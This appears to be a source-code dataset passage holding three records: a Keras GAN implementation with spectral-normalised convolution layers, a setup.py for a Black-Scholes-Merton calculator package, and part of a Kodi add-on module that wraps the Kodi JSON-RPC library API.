if activation == "lrelu":
return keras.layers.LeakyReLU(.1, name=name)
else:
return keras.layers.Activation(activation, name=name)
def batch_norm():
return keras.layers.BatchNormalization(momentum=0.9, epsilon=0.00002)
def build_discriminator(
n_pixels=32,
alpha=2,
filter_dim=64,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
pooling="avg",
name="Discriminator",
):
# notes:
# - don't use spectral norm and batch norm (see https://github.com/AlexiaJM/RelativisticGAN/blob/master/code/GAN_losses_iter.py)
start_pow = np.log2(n_pixels) - 3
img = keras.Input(shape=(n_pixels, n_pixels, 3))
conv_block = img
n_blocks = int(start_pow + 1)
for i in range(n_blocks):
n_filters = int(filter_dim * (alpha**i))
# conv_block = Conv2D(
# n_filters,
# spectral_normalization=spectral_normalization,
# kernel_initializer=initializer,
# kernel_size=3,
# strides=1,
# padding="same",
# use_bias=use_bias,
# name=f"D{i}-k3s1-s{spectral_normalization}",
# )(conv_block)
#
# if batch_normalization:
# conv_block = batch_norm()(conv_block)
#
# conv_block = act_layer(
# activation, name=f"D{i}.1-{activation}")(conv_block)
conv_block = Conv2D(
n_filters,
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=4,
strides=2,
padding="same",
use_bias=use_bias,
name=f"D{i}-k4s2-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{i}.2-{activation}")(conv_block)
conv_block = Conv2D(
int(filter_dim * (alpha**n_blocks)),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=3,
strides=1,
padding="same",
use_bias=use_bias,
name=f"D{n_blocks}-k3s1-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{n_blocks}.1-{activation}")(conv_block)
if pooling == "avg":
h = keras.layers.GlobalAveragePooling2D()(conv_block)
else:
h = keras.layers.Flatten()(conv_block)
class_block = keras.layers.Dense(1, kernel_initializer=initializer)(h)
# class_block = act_layer(
# "sigmoid", name=f"Do-sigmoid")(class_block)
return keras.Model(img, class_block, name="Discriminator")
def build_generator(
n_pixels=32,
latent_dim=128,
alpha=2,
filter_dim=64,
kernel_size=3,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
upsample=True,
name="Generator",
):
start_pow = np.log2(n_pixels) - 2
noise_input = keras.Input(shape=(latent_dim, ))
noise_block = keras.layers.Dense(
int(filter_dim * (alpha**start_pow)) * 4 * 4, input_dim=latent_dim,
kernel_initializer=initializer, name=f"G-dense")(noise_input)
# noise_block = act_layer(activation, name=f"G.d-{activation}")(noise_block)
noise_block = keras.layers.Reshape(
(4, 4, int(filter_dim * (alpha**start_pow))))(noise_block)
# if batch_normalization:
# noise_block = batch_norm()(noise_block)
up_conv_block = noise_block
n_blocks = int(start_pow)
for i in range(1, n_blocks + 1):
up_conv_block = Conv2DTranspose(
int((alpha**(start_pow - i)) * filter_dim),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=4, strides=2,
padding="same", use_bias=use_bias,
name=f"G{i}-k4s2-s{spectral_normalization}")(up_conv_block)
if batch_normalization:
up_conv_block = batch_norm()(up_conv_block)
up_conv_block = act_layer(activation,
name=f"G{i}-{activation}")(up_conv_block)
up_conv_block = Conv2D(
3, spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=3, strides=1,
padding="same", use_bias=use_bias,
name=f"Go-k3s1-s{spectral_normalization}")(up_conv_block)
up_conv_block = act_layer("tanh", name=f"Go-tanh")(up_conv_block)
return keras.Model(noise_input, up_conv_block, name=name)
# epsilon set according to BIGGAN https://arxiv.org/pdf/1809.11096.pdf
def _l2normalizer(v, epsilon=1e-4):
return v / (K.sum(v**2)**0.5 + epsilon)
def power_iteration(W, u, rounds=1):
'''
Accroding the paper, we only need to do power iteration one time.
'''
_u = u
for i in range(rounds):
_v = _l2normalizer(K.dot(_u, W))
_u = _l2normalizer(K.dot(_v, K.transpose(W)))
W_sn = K.sum(K.dot(_u, W) * _v)
return W_sn, _u, _v
class Conv2D(keras.layers.Conv2D):
def __init__(self, filters, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2D, self).__init__(filters, **kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2D, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-1], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
outputs = K.conv2d(inputs,
self.compute_spectral_normal(training=training),
strides=self.strides, padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2D, self).compute_output_shape(input_shape)
class Conv2DTranspose(keras.layers.Conv2DTranspose):
def __init__(self, spectral_normalization=False, **kwargs):
self.spectral_normalization = spectral_normalization
super(Conv2DTranspose, self).__init__(**kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.u = self.add_weight(name='u', shape=(1, self.filters),
initializer='uniform', trainable=False)
# self.kernel = self.add_weight(name='kernel',
# shape=(input_shape[1], self.output_dim),
# initializer='uniform',
# trainable=True)
super(Conv2DTranspose, self).build(input_shape)
# Be sure to call this at the end
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten the Tensor
# [out_channels, N]
W_mat = K.reshape(self.kernel, [W_shape[-2], -1])
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
input_shape = K.shape(inputs)
batch_size = input_shape[0]
if self.data_format == 'channels_first':
h_axis, w_axis = 2, 3
else:
h_axis, w_axis = 1, 2
height, width = input_shape[h_axis], input_shape[w_axis]
kernel_h, kernel_w = self.kernel_size
stride_h, stride_w = self.strides
# Infer the dynamic output shape:
out_height = keras.utils.conv_utils.deconv_length(
height, stride_h, kernel_h, self.padding)
out_width = keras.utils.conv_utils.deconv_length(
width, stride_w, kernel_w, self.padding)
if self.data_format == 'channels_first':
output_shape = (batch_size, self.filters, out_height, out_width)
else:
output_shape = (batch_size, out_height, out_width, self.filters)
outputs = K.conv2d_transpose(
inputs,
self.compute_spectral_normal(training=training),
output_shape,
self.strides,
padding=self.padding,
data_format=self.data_format,
# dilation_rate=self.dilation_rate
)
if self.use_bias:
outputs = K.bias_add(outputs, self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
return super(Conv2DTranspose, self).compute_output_shape(input_shape)
def act_layer(activation, name=None):
if name is None:
name = activation
if activation == "lrelu":
return keras.layers.LeakyReLU(.1, name=name)
else:
return keras.layers.Activation(activation, name=name)
def batch_norm():
return keras.layers.BatchNormalization(momentum=0.9, epsilon=0.00002)
def build_discriminator(
n_pixels=32,
alpha=2,
filter_dim=64,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
pooling="avg",
name="Discriminator",
):
# notes:
# - don't use spectral norm and batch norm (see https://github.com/AlexiaJM/RelativisticGAN/blob/master/code/GAN_losses_iter.py)
start_pow = np.log2(n_pixels) - 3
img = keras.Input(shape=(n_pixels, n_pixels, 3))
conv_block = img
n_blocks = int(start_pow + 1)
for i in range(n_blocks):
n_filters = int(filter_dim * (alpha**i))
# conv_block = Conv2D(
# n_filters,
# spectral_normalization=spectral_normalization,
# kernel_initializer=initializer,
# kernel_size=3,
# strides=1,
# padding="same",
# use_bias=use_bias,
# name=f"D{i}-k3s1-s{spectral_normalization}",
# )(conv_block)
#
# if batch_normalization:
# conv_block = batch_norm()(conv_block)
#
# conv_block = act_layer(
# activation, name=f"D{i}.1-{activation}")(conv_block)
conv_block = Conv2D(
n_filters,
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=4,
strides=2,
padding="same",
use_bias=use_bias,
name=f"D{i}-k4s2-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{i}.2-{activation}")(conv_block)
conv_block = Conv2D(
int(filter_dim * (alpha**n_blocks)),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer,
kernel_size=3,
strides=1,
padding="same",
use_bias=use_bias,
name=f"D{n_blocks}-k3s1-s{spectral_normalization}",
)(conv_block)
if batch_normalization:
conv_block = batch_norm()(conv_block)
conv_block = act_layer(activation,
name=f"D{n_blocks}.1-{activation}")(conv_block)
if pooling == "avg":
h = keras.layers.GlobalAveragePooling2D()(conv_block)
else:
h = keras.layers.Flatten()(conv_block)
class_block = keras.layers.Dense(1, kernel_initializer=initializer)(h)
# class_block = act_layer(
# "sigmoid", name=f"Do-sigmoid")(class_block)
return keras.Model(img, class_block, name="Discriminator")
def build_generator(
n_pixels=32,
latent_dim=128,
alpha=2,
filter_dim=64,
kernel_size=3,
activation="relu",
batch_normalization=False,
spectral_normalization=False,
initializer="glorot_uniform",
use_bias=True,
upsample=True,
name="Generator",
):
start_pow = np.log2(n_pixels) - 2
noise_input = keras.Input(shape=(latent_dim, ))
noise_block = keras.layers.Dense(
int(filter_dim * (alpha**start_pow)) * 4 * 4, input_dim=latent_dim,
kernel_initializer=initializer, name=f"G-dense")(noise_input)
# noise_block = act_layer(activation, name=f"G.d-{activation}")(noise_block)
noise_block = keras.layers.Reshape(
(4, 4, int(filter_dim * (alpha**start_pow))))(noise_block)
# if batch_normalization:
# noise_block = batch_norm()(noise_block)
up_conv_block = noise_block
n_blocks = int(start_pow)
for i in range(1, n_blocks + 1):
up_conv_block = Conv2DTranspose(
int((alpha**(start_pow - i)) * filter_dim),
spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=4, strides=2,
padding="same", use_bias=use_bias,
name=f"G{i}-k4s2-s{spectral_normalization}")(up_conv_block)
if batch_normalization:
up_conv_block = batch_norm()(up_conv_block)
up_conv_block = act_layer(activation,
name=f"G{i}-{activation}")(up_conv_block)
up_conv_block = Conv2D(
3, spectral_normalization=spectral_normalization,
kernel_initializer=initializer, kernel_size=3, strides=1,
padding="same", use_bias=use_bias,
name=f"Go-k3s1-s{spectral_normalization}")(up_conv_block)
up_conv_block = act_layer("tanh", name=f"Go-tanh")(up_conv_block)
return keras.Model(noise_input, up_conv_block, name=name)
| 33.294753
| 132
| 0.59657
|
1fb41778c38b42f7717bc134f22b3909f0fff559
| 630
|
py
|
Python
|
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
setup.py
|
jwg4/bsm_model
|
9699b594d20ae3faf260e444f648e2fcc7a402dd
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(name='bsm_model',
version='0.2',
description='The Black–Scholes–Merton Model calculator in Python.',
long_description='The Black–Scholes–Merton Model calculator in Python.',
long_description_content_type='text/markdown',
url='https://github.com/leopoldsw/bsm_model/',
download_url = 'https://github.com/leopoldsw/bsm_model/archive/v0.2.tar.gz',
author='Leopold W.',
author_email='lsw@lwco.com',
packages=find_packages(exclude=("tests", "tests_dev")),
install_requires=['pandas', 'numpy', 'scipy', 'datetime'],
)
| 39.375
| 82
| 0.687302
|
5adc6532da255dc091cfa185e66dffe8d43c25a3
| 36,300
|
py
|
Python
|
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
lib/helpers/kodidb.py
|
semool/script.module.metadatautils
|
748880e4da557a6da0e51e9a962f9fefb5fcc5c5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""get metadata from the kodi DB"""
import os, sys
import xbmc
import xbmcgui
import xbmcvfs
from .utils import json, try_encode, log_msg, log_exception, get_clean_image, KODI_VERSION
from .utils import try_parse_int, localdate_from_utc_string, localized_date_time
from .kodi_constants import *
from operator import itemgetter
import arrow
import datetime
class KodiDb(object):
"""various methods and helpers to get data from kodi json api"""
def __init__(self, simplecache=None):
'''Initialize - optionaly provide simplecache object'''
if not simplecache:
from simplecache import SimpleCache
self.cache = SimpleCache()
else:
self.cache = simplecache
def movie(self, db_id):
"""get moviedetails from kodi db"""
return self.get_json("VideoLibrary.GetMovieDetails", returntype="moviedetails",
fields=FIELDS_MOVIES, optparam=("movieid", try_parse_int(db_id)))
def movies(self, sort=None, filters=None, limits=None, filtertype=None):
"""get moviedetails from kodi db"""
return self.get_json("VideoLibrary.GetMovies", sort=sort, filters=filters,
fields=FIELDS_MOVIES, limits=limits, returntype="movies", filtertype=filtertype)
def movie_by_imdbid(self, imdb_id):
"""gets a movie from kodidb by imdbid."""
# apparently you can't filter on imdb so we have to do this the complicated way
if KODI_VERSION > 16:
# from Kodi 17 we have a uniqueid field instead of imdbnumber
#all_items = self.get_json('VideoLibrary.GetMovies', fields=["uniqueid"], returntype="movies")
all_items = self.cache.get("kodidb.all_movies_uniqueids")
if not all_items:
all_items = self.get_json('VideoLibrary.GetMovies', fields=["uniqueid"], returntype="movies")
self.cache.set("kodidb.all_movies_uniqueids", all_items, expiration=datetime.timedelta(minutes=15))
for item in all_items:
if 'uniqueid' in item:
for item2 in list(item["uniqueid"].values()):
if item2 == imdb_id:
return self.movie(item["movieid"])
else:
all_items = self.get_json('VideoLibrary.GetMovies', fields=["imdbnumber"], returntype="movies")
for item in all_items:
if item["imdbnumber"] == imdb_id:
return self.movie(item["movieid"])
return {}
def tvshow(self, db_id):
"""get tvshow from kodi db"""
tvshow = self.get_json("VideoLibrary.GetTvShowDetails", returntype="tvshowdetails",
fields=FIELDS_TVSHOWS, optparam=("tvshowid", try_parse_int(db_id)))
return self.tvshow_watchedcounts(tvshow)
def tvshows(self, sort=None, filters=None, limits=None, filtertype=None):
"""get tvshows from kodi db"""
tvshows = self.get_json("VideoLibrary.GetTvShows", sort=sort, filters=filters,
fields=FIELDS_TVSHOWS, limits=limits, returntype="tvshows", filtertype=filtertype)
# append watched counters
for tvshow in tvshows:
self.tvshow_watchedcounts(tvshow)
return tvshows
def tvshow_by_imdbid(self, imdb_id):
"""gets a tvshow from kodidb by imdbid (or tvdbid)."""
# apparently you can't filter on imdb so we have to do this the complicated way
if KODI_VERSION > 16:
# from Kodi 17 we have a uniqueid field instead of imdbnumber
all_items = self.get_json('VideoLibrary.GetTvShows', fields=["uniqueid"], returntype="tvshows")
for item in all_items:
if 'uniqueid' in item:
for item2 in list(item["uniqueid"].values()):
if item2 == imdb_id:
return self.tvshow(item["tvshowid"])
else:
# pre-kodi 17 approach
all_items = self.get_json('VideoLibrary.GetTvShows', fields=["imdbnumber"], returntype="tvshows")
for item in all_items:
if item["imdbnumber"] == imdb_id:
return self.tvshow(item["tvshowid"])
return {}
def episode(self, db_id):
"""get episode from kodi db"""
return self.get_json("VideoLibrary.GetEpisodeDetails", returntype="episodedetails",
fields=FIELDS_EPISODES, optparam=("episodeid", try_parse_int(db_id)))
def episodes(self, sort=None, filters=None, limits=None, filtertype=None, tvshowid=None, fields=FIELDS_EPISODES):
"""get episodes from kodi db"""
if tvshowid:
params = ("tvshowid", try_parse_int(tvshowid))
else:
params = None
return self.get_json("VideoLibrary.GetEpisodes", sort=sort, filters=filters, fields=fields,
limits=limits, returntype="episodes", filtertype=filtertype, optparam=params)
def musicvideo(self, db_id):
"""get musicvideo from kodi db"""
return self.get_json("VideoLibrary.GetMusicVideoDetails", returntype="musicvideodetails",
fields=FIELDS_MUSICVIDEOS, optparam=("musicvideoid", try_parse_int(db_id)))
def musicvideos(self, sort=None, filters=None, limits=None, filtertype=None):
"""get musicvideos from kodi db"""
return self.get_json("VideoLibrary.GetMusicVideos", sort=sort, filters=filters,
fields=FIELDS_MUSICVIDEOS, limits=limits, returntype="musicvideos", filtertype=filtertype)
def movieset(self, db_id, include_set_movies_fields=""):
"""get movieset from kodi db"""
if include_set_movies_fields:
optparams = [("setid", try_parse_int(db_id)), ("movies", {"properties": include_set_movies_fields})]
else:
optparams = ("setid", try_parse_int(db_id))
return self.get_json("VideoLibrary.GetMovieSetDetails", returntype="",
fields=["title", "art", "playcount"], optparam=optparams)
def moviesets(self, sort=None, limits=None, include_set_movies=False):
"""get moviesetdetails from kodi db"""
if include_set_movies:
optparam = ("movies", {"properties": FIELDS_MOVIES})
else:
optparam = None
return self.get_json("VideoLibrary.GetMovieSets", sort=sort,
fields=["title", "art", "playcount"],
limits=limits, returntype="", optparam=optparam)
def files(self, vfspath, sort=None, limits=None):
"""gets all items in a kodi vfs path"""
return self.get_json("Files.GetDirectory", returntype="", optparam=("directory", vfspath),
fields=FIELDS_FILES, sort=sort, limits=limits)
def genres(self, media_type):
"""return all genres for the given media type (movie/tvshow/musicvideo)"""
return self.get_json("VideoLibrary.GetGenres", fields=["thumbnail", "title"],
returntype="genres", optparam=("type", media_type))
def song(self, db_id):
"""get songdetails from kodi db"""
return self.get_json("AudioLibrary.GetSongDetails", returntype="songdetails",
fields=FIELDS_SONGS, optparam=("songid", try_parse_int(db_id)))
def songs(self, sort=None, filters=None, limits=None, filtertype=None):
"""get songs from kodi db"""
return self.get_json("AudioLibrary.GetSongs", sort=sort, filters=filters,
fields=FIELDS_SONGS, limits=limits, returntype="songs", filtertype=filtertype)
def album(self, db_id):
"""get albumdetails from kodi db"""
album = self.get_json("AudioLibrary.GetAlbumDetails", returntype="albumdetails",
fields=FIELDS_ALBUMS, optparam=("albumid", try_parse_int(db_id)))
# override type as the kodi json api is returning the album type instead of mediatype
album["type"] = "album"
return album
def albums(self, sort=None, filters=None, limits=None, filtertype=None):
"""get albums from kodi db"""
albums = self.get_json("AudioLibrary.GetAlbums", sort=sort, filters=filters,
fields=FIELDS_ALBUMS, limits=limits, returntype="albums", filtertype=filtertype)
# override type as the kodi json api is returning the album type instead of mediatype
for album in albums:
album["type"] = "album"
return albums
def artist(self, db_id):
"""get artistdetails from kodi db"""
return self.get_json("AudioLibrary.GetArtistDetails", returntype="artistdetails",
fields=FIELDS_ARTISTS, optparam=("artistid", try_parse_int(db_id)))
def artists(self, sort=None, filters=None, limits=None, filtertype=None):
"""get artists from kodi db"""
return self.get_json("AudioLibrary.GetArtists", sort=sort, filters=filters,
fields=FIELDS_ARTISTS, limits=limits, returntype="artists", filtertype=filtertype)
def recording(self, db_id):
"""get pvr recording from kodi db"""
return self.get_json("PVR.GetRecordingDetails", returntype="recordingdetails",
fields=FIELDS_RECORDINGS, optparam=("recordingid", try_parse_int(db_id)))
def recordings(self, limits=None):
"""get pvr recordings from kodi db"""
return self.get_json("PVR.GetRecordings", fields=FIELDS_RECORDINGS, limits=limits, returntype="recordings")
def channel(self, db_id):
"""get pvr channel from kodi db"""
return self.get_json("PVR.GetChannelDetails", returntype="channeldetails",
fields=FIELDS_CHANNELS, optparam=("channelid", try_parse_int(db_id)))
def channels(self, limits=None, channelgroupid="alltv"):
"""get pvr channels from kodi db"""
return self.get_json("PVR.GetChannels", fields=FIELDS_CHANNELS, limits=limits,
returntype="channels", optparam=("channelgroupid", channelgroupid))
def channelgroups(self, limits=None, channeltype="tv"):
"""get pvr channelgroups from kodi db"""
return self.get_json("PVR.GetChannelGroups", fields=[], limits=limits,
returntype="channelgroups", optparam=("channeltype", channeltype))
def timers(self, limits=None):
"""get pvr recordings from kodi db"""
fields = ["title", "endtime", "starttime", "channelid", "summary", "file"]
return self.get_json("PVR.GetTimers", fields=fields, limits=limits, returntype="timers")
def favourites(self):
"""get kodi favourites"""
items = self.get_favourites_from_file()
if not items:
fields = ["path", "thumbnail", "window", "windowparameter"]
optparams = ("type", None)
items = self.get_json("Favourites.GetFavourites", fields=fields, optparam=optparams)
return items
def castmedia(self, actorname):
"""helper to display all media (movies/shows) for a specific actor"""
# use db counts as simple checksum
filters = [{"operator": "contains", "field": "actor", "value": actorname}]
all_items = self.movies(filters=filters)
for item in self.tvshows(filters=filters):
item["file"] = "videodb://tvshows/titles/%s" % item["tvshowid"]
item["isFolder"] = True
all_items.append(item)
return all_items
def actors(self):
"""return all actors"""
all_items = []
all_actors = []
result = self.files("videodb://movies/actors")
result += self.files("videodb://tvshows/actors")
for item in result:
if not item["label"] in all_actors:
all_actors.append(item["label"])
item["type"] = "actor"
item["isFolder"] = True
if not item["art"].get("thumb"):
item["art"]["thumb"] = "DefaultActor.png"
all_items.append(item)
return sorted(all_items, key=itemgetter("label"))
@staticmethod
def set_json(jsonmethod, params):
"""method to set info in the kodi json api"""
kodi_json = {}
kodi_json["jsonrpc"] = "2.0"
kodi_json["method"] = jsonmethod
kodi_json["params"] = params
kodi_json["id"] = 1
json_response = xbmc.executeJSONRPC(try_encode(json.dumps(kodi_json)))
if sys.version_info.major == 3:
return json.loads(json_response)
else:
return json.loads(json_response.decode('utf-8', 'replace'))
@staticmethod
def get_json(jsonmethod, sort=None, filters=None, fields=None, limits=None,
returntype=None, optparam=None, filtertype=None):
"""method to get details from the kodi json api"""
kodi_json = {}
kodi_json["jsonrpc"] = "2.0"
kodi_json["method"] = jsonmethod
kodi_json["params"] = {}
if optparam:
if isinstance(optparam, list):
for param in optparam:
kodi_json["params"][param[0]] = param[1]
else:
kodi_json["params"][optparam[0]] = optparam[1]
kodi_json["id"] = 1
if sort:
kodi_json["params"]["sort"] = sort
if filters:
if not filtertype:
filtertype = "and"
if len(filters) > 1:
kodi_json["params"]["filter"] = {filtertype: filters}
else:
kodi_json["params"]["filter"] = filters[0]
if fields:
kodi_json["params"]["properties"] = fields
if limits:
kodi_json["params"]["limits"] = {"start": limits[0], "end": limits[1]}
json_response = xbmc.executeJSONRPC(try_encode(json.dumps(kodi_json)))
if sys.version_info.major == 3:
json_object = json.loads(json_response)
else:
json_object = json.loads(json_response.decode('utf-8', 'replace'))
# set the default returntype to prevent errors
if "details" in jsonmethod.lower():
result = {}
else:
result = []
if 'result' in json_object:
if returntype and returntype in json_object['result']:
# returntype specified, return immediately
result = json_object['result'][returntype]
else:
# no returntype specified, we'll have to look for it
for key, value in list(json_object['result'].items()):
if not key == "limits" and (isinstance(value, list) or isinstance(value, dict)):
result = value
else:
log_msg(json_response)
log_msg(kodi_json)
return result
@staticmethod
def get_favourites_from_file():
"""json method for favourites doesn't return all items (such as android apps) so retrieve them from file"""
allfavourites = []
try:
from xml.dom.minidom import parse
if sys.version_info.major == 3:
favourites_path = xbmcvfs.translatePath('special://profile/favourites.xml')
else:
favourites_path = xbmc.translatePath('special://profile/favourites.xml').decode("utf-8")
if xbmcvfs.exists(favourites_path):
doc = parse(favourites_path)
result = doc.documentElement.getElementsByTagName('favourite')
for fav in result:
action = fav.childNodes[0].nodeValue
action = action.replace('"', '')
label = fav.attributes['name'].nodeValue
try:
thumb = fav.attributes['thumb'].nodeValue
except Exception:
thumb = ""
window = ""
windowparameter = ""
action_type = "unknown"
if action.startswith("StartAndroidActivity"):
action_type = "androidapp"
elif action.startswith("ActivateWindow"):
action_type = "window"
actionparts = action.replace("ActivateWindow(", "").replace(",return)", "").split(",")
window = actionparts[0]
if len(actionparts) > 1:
windowparameter = actionparts[1]
elif action.startswith("PlayMedia"):
action_type = "media"
action = action.replace("PlayMedia(", "")[:-1]
allfavourites.append({"label": label, "path": action, "thumbnail": thumb, "window": window,
"windowparameter": windowparameter, "type": action_type})
except Exception as exc:
log_exception(__name__, exc)
return allfavourites
@staticmethod
def create_listitem(item, as_tuple=True, offscreen=True):
"""helper to create a kodi listitem from kodi compatible dict with mediainfo"""
try:
if KODI_VERSION > 17:
liz = xbmcgui.ListItem(
label=item.get("label", ""),
label2=item.get("label2", ""),
path=item['file'],
offscreen=offscreen)
else:
liz = xbmcgui.ListItem(
label=item.get("label", ""),
label2=item.get("label2", ""),
path=item['file'])
# only set isPlayable prop if really needed
if item.get("isFolder", False):
liz.setProperty('IsPlayable', 'false')
elif "plugin://script.skin.helper" not in item['file']:
liz.setProperty('IsPlayable', 'true')
nodetype = "Video"
if item["type"] in ["song", "album", "artist"]:
nodetype = "Music"
# extra properties
for key, value in list(item["extraproperties"].items()):
liz.setProperty(key, value)
# video infolabels
if nodetype == "Video":
infolabels = {
"title": item.get("title"),
"size": item.get("size"),
"genre": item.get("genre"),
"year": item.get("year"),
"top250": item.get("top250"),
"tracknumber": item.get("tracknumber"),
"rating": item.get("rating"),
"playcount": item.get("playcount"),
"overlay": item.get("overlay"),
"cast": item.get("cast"),
"castandrole": item.get("castandrole"),
"director": item.get("director"),
"mpaa": item.get("mpaa"),
"plot": item.get("plot"),
"plotoutline": item.get("plotoutline"),
"originaltitle": item.get("originaltitle"),
"sorttitle": item.get("sorttitle"),
"duration": item.get("duration"),
"studio": item.get("studio"),
"tagline": item.get("tagline"),
"writer": item.get("writer"),
"tvshowtitle": item.get("tvshowtitle"),
"premiered": item.get("premiered"),
"status": item.get("status"),
"code": item.get("imdbnumber"),
"imdbnumber": item.get("imdbnumber"),
"aired": item.get("aired"),
"credits": item.get("credits"),
"album": item.get("album"),
"artist": item.get("artist"),
"votes": item.get("votes"),
"trailer": item.get("trailer")
}
#ERROR: NEWADDON Unknown Video Info Key "progress" in Kodi 19 ?!
if KODI_VERSION < 18:
infolabels["progress"] = item.get('progresspercentage')
if item["type"] == "episode":
infolabels["season"] = item["season"]
infolabels["episode"] = item["episode"]
# streamdetails
if item.get("streamdetails"):
liz.addStreamInfo("video", item["streamdetails"].get("video", {}))
liz.addStreamInfo("audio", item["streamdetails"].get("audio", {}))
liz.addStreamInfo("subtitle", item["streamdetails"].get("subtitle", {}))
if "dateadded" in item:
infolabels["dateadded"] = item["dateadded"]
if "date" in item:
infolabels["date"] = item["date"]
# music infolabels
else:
infolabels = {
"title": item.get("title"),
"size": item.get("size"),
"genre": item.get("genre"),
"year": item.get("year"),
"tracknumber": item.get("track"),
"album": item.get("album"),
"artist": " / ".join(item.get('artist')),
"rating": str(item.get("rating", 0)),
"lyrics": item.get("lyrics"),
"playcount": item.get("playcount")
}
if "date" in item:
infolabels["date"] = item["date"]
if "duration" in item:
infolabels["duration"] = item["duration"]
if "lastplayed" in item:
infolabels["lastplayed"] = item["lastplayed"]
# setting the dbtype and dbid is supported from kodi krypton and up
if KODI_VERSION > 16 and item["type"] not in ["recording", "channel", "favourite", "genre", "categorie"]:
infolabels["mediatype"] = item["type"]
# setting the dbid on music items is not supported ?
if nodetype == "Video" and "DBID" in item["extraproperties"]:
infolabels["dbid"] = item["extraproperties"]["DBID"]
if "lastplayed" in item:
infolabels["lastplayed"] = item["lastplayed"]
# assign the infolabels
liz.setInfo(type=nodetype, infoLabels=infolabels)
# artwork
liz.setArt(item.get("art", {}))
if KODI_VERSION > 17:
if "icon" in item:
liz.setArt({"icon":item['icon']})
if "thumbnail" in item:
liz.setArt({"thumb":item['thumbnail']})
else:
if "icon" in item:
liz.setIconImage(item['icon'])
if "thumbnail" in item:
liz.setThumbnailImage(item['thumbnail'])
# contextmenu
if item["type"] in ["episode", "season"] and "season" in item and "tvshowid" in item:
# add series and season level to widgets
if "contextmenu" not in item:
item["contextmenu"] = []
item["contextmenu"] += [
(xbmc.getLocalizedString(20364), "ActivateWindow(Video,videodb://tvshows/titles/%s/,return)"
% (item["tvshowid"])),
(xbmc.getLocalizedString(20373), "ActivateWindow(Video,videodb://tvshows/titles/%s/%s/,return)"
% (item["tvshowid"], item["season"]))]
if "contextmenu" in item:
liz.addContextMenuItems(item["contextmenu"])
if as_tuple:
return item["file"], liz, item.get("isFolder", False)
else:
return liz
except Exception as exc:
log_exception(__name__, exc)
log_msg(item)
return None
@staticmethod
def prepare_listitem(item):
"""helper to convert kodi output from json api to compatible format for listitems"""
try:
# fix values returned from json to be used as listitem values
properties = item.get("extraproperties", {})
# set type
for idvar in [
('episode', 'DefaultTVShows.png'),
('tvshow', 'DefaultTVShows.png'),
('movie', 'DefaultMovies.png'),
('song', 'DefaultAudio.png'),
('album', 'DefaultAudio.png'),
('artist', 'DefaultArtist.png'),
('musicvideo', 'DefaultMusicVideos.png'),
('recording', 'DefaultTVShows.png'),
('channel', 'DefaultAddonPVRClient.png')]:
dbid = item.get(idvar[0] + "id")
if dbid:
properties["DBID"] = str(dbid)
if not item.get("type"):
item["type"] = idvar[0]
if not item.get("icon"):
item["icon"] = idvar[1]
break
# general properties
if "genre" in item and isinstance(item['genre'], list):
item["genre"] = " / ".join(item['genre'])
if "studio" in item and isinstance(item['studio'], list):
item["studio"] = " / ".join(item['studio'])
if "writer" in item and isinstance(item['writer'], list):
item["writer"] = " / ".join(item['writer'])
